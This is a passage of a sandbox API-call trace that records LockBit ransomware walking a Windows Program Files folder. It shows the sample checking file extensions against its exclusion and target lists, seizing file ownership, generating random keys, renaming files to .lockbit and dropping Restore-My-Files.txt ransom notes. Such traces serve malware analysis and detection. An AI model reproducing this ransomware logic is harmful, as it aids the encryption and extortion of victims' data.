Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.087] malloc (_Size=0xd0) returned 0x1ff1e60 [0079.087] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xd0, FileInformationClass=0xa) returned 0xc0000008 [0079.087] free (_Block=0x1ff1e60) [0079.087] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 1 [0079.087] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt") returned 73 [0079.087] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.087] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70e29c25, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70e29c25, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49eb515f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2661e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BabyBoyMainToNotesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0079.087] lstrcmpiW (lpString1=".", lpString2="BabyBoyMainToNotesBackground_PAL.wmv") returned -1 [0079.087] lstrcmpiW (lpString1="..", lpString2="BabyBoyMainToNotesBackground_PAL.wmv") returned -1 [0079.087] PathFindExtensionW (pszPath="BabyBoyMainToNotesBackground_PAL.wmv") returned=".wmv" [0079.087] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0079.087] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0079.087] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0079.087] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0079.087] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0079.088] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0079.088] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0079.089] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0079.089] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0079.089] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0079.089] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0079.089] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0079.089] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0079.089] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0079.089] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0079.089] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0079.089] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.089] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0079.089] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0079.089] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0079.089] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0079.089] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BabyBoyMainToNotesBackground_PAL.wmv") returned 1 [0079.089] lstrcmpiW (lpString1="ntldr", lpString2="BabyBoyMainToNotesBackground_PAL.wmv") returned 1 [0079.089] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BabyBoyMainToNotesBackground_PAL.wmv") returned 1 [0079.089] lstrcmpiW (lpString1="bootsect.bak", lpString2="BabyBoyMainToNotesBackground_PAL.wmv") returned 1 [0079.089] lstrcmpiW (lpString1="autorun.inf", lpString2="BabyBoyMainToNotesBackground_PAL.wmv") returned -1 [0079.089] lstrcmpiW (lpString1="thumbs.db", lpString2="BabyBoyMainToNotesBackground_PAL.wmv") returned 1 [0079.089] lstrcmpiW (lpString1="iconcache.db", lpString2="BabyBoyMainToNotesBackground_PAL.wmv") returned 1 [0079.089] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\") returned="" [0079.089] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned=".wmv" [0079.089] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0079.090] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0079.090] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0079.091] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv.lockbit") returned 97 [0079.091] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.091] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.092] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.092] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.092] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.092] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.092] RtlFreeAnsiString (AnsiString="\\") [0079.092] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0079.092] malloc (_Size=0x200) returned 0x77d800 [0079.092] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.092] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.092] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.093] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.093] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.093] CloseHandle (hObject=0x3bc) returned 1 [0079.093] free (_Block=0x77d800) [0079.093] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0079.094] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.094] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.094] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=157214) returned 1 [0079.094] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.094] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.094] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.095] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.095] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.097] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.097] malloc (_Size=0xd8) returned 0x1ff1e60 [0079.097] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xd8, FileInformationClass=0xa) returned 0x0 [0079.098] free (_Block=0x1ff1e60) [0079.098] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 1 [0079.098] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt") returned 73 [0079.098] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.099] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70e4fd82, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70e4fd82, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49eb515f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1c9de, dwReserved0=0x0, dwReserved1=0x0, cFileName="BabyBoyMainToScenesBackground.wmv", cAlternateFileName="")) returned 1 [0079.099] lstrcmpiW (lpString1=".", lpString2="BabyBoyMainToScenesBackground.wmv") returned -1 [0079.099] lstrcmpiW (lpString1="..", lpString2="BabyBoyMainToScenesBackground.wmv") returned -1 [0079.099] PathFindExtensionW (pszPath="BabyBoyMainToScenesBackground.wmv") returned=".wmv" [0079.099] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0079.099] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0079.099] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0079.099] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0079.099] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0079.099] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0079.099] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0079.099] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0079.099] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0079.099] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0079.099] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0079.099] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0079.099] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0079.099] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0079.099] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0079.099] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0079.099] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0079.100] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0079.100] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0079.100] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0079.100] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0079.100] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0079.100] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0079.100] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0079.100] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.100] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0079.100] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0079.100] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0079.100] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0079.100] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0079.100] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0079.100] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0079.100] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0079.101] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0079.101] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0079.101] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0079.101] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0079.101] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0079.101] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0079.101] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0079.101] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0079.101] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0079.101] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.101] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0079.101] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0079.101] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0079.101] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0079.101] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BabyBoyMainToScenesBackground.wmv") returned 1 [0079.101] lstrcmpiW (lpString1="ntldr", lpString2="BabyBoyMainToScenesBackground.wmv") returned 1 [0079.102] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BabyBoyMainToScenesBackground.wmv") returned 1 [0079.102] lstrcmpiW (lpString1="bootsect.bak", lpString2="BabyBoyMainToScenesBackground.wmv") returned 1 [0079.102] lstrcmpiW (lpString1="autorun.inf", lpString2="BabyBoyMainToScenesBackground.wmv") returned -1 [0079.102] lstrcmpiW (lpString1="thumbs.db", lpString2="BabyBoyMainToScenesBackground.wmv") returned 1 [0079.102] lstrcmpiW (lpString1="iconcache.db", lpString2="BabyBoyMainToScenesBackground.wmv") returned 1 [0079.102] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\") returned="" [0079.102] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned=".wmv" [0079.102] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0079.102] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0079.102] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0079.102] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0079.102] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0079.102] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0079.102] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0079.102] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0079.102] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0079.103] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0079.103] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv.lockbit") returned 94 [0079.103] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.107] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.107] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.107] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.107] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.107] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.107] RtlFreeAnsiString (AnsiString="\\") [0079.107] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0079.107] malloc (_Size=0x200) returned 0x77d800 [0079.107] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.107] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.107] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.107] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.108] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.108] CloseHandle (hObject=0x3a0) returned 1 [0079.108] free (_Block=0x77d800) [0079.108] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0079.108] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.108] malloc (_Size=0x40068) returned 0x3d70048 [0079.108] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=117214) returned 1 [0079.108] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.109] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0079.109] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.109] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0079.109] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0079.111] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.111] malloc (_Size=0xd2) returned 0x1ff1e60 [0079.111] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xd2, FileInformationClass=0xa) returned 0x0 [0079.112] free (_Block=0x1ff1e60) [0079.112] 